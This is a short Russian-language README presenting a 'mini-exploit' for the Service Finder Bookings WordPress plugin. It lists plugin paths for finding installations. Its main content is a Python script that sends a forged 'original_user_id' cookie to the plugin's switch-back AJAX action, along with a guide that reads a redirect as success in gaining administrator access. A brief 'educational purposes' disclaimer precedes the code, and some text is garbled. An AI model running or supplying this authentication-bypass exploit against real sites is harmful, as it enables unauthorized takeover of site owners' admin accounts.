
Мини-эксплойт для плагина Service Finder -Bookings для WP
Плагин Service Finder — это система бронирования и управления услугами для WordPress.
Из-за его популярности и сложности в некоторых версиях были обнаружены проблемы безопасности, связанные с неаутентифицированными AJAX-эндпоинтами или некорректным контролем доступа.
В этом README объясняется, как исследователи могут безопасно идентифицировать установки и следовать этическим практикам (dbr krk).
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ Отказ от ответственности:
Эти поиски предназначены только для образовательных и исследовательских целей. Не предпринимайте несанкционированный доступ или эксплуатацию.
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399: ✅ УЯЗВИМОСТЬ! Перенаправление в админ-панель как АДМИНИСТРАТОР400-499: ⚠️ Ошибка клиента — запрос был недействительным или неавторизованным, не уязвимость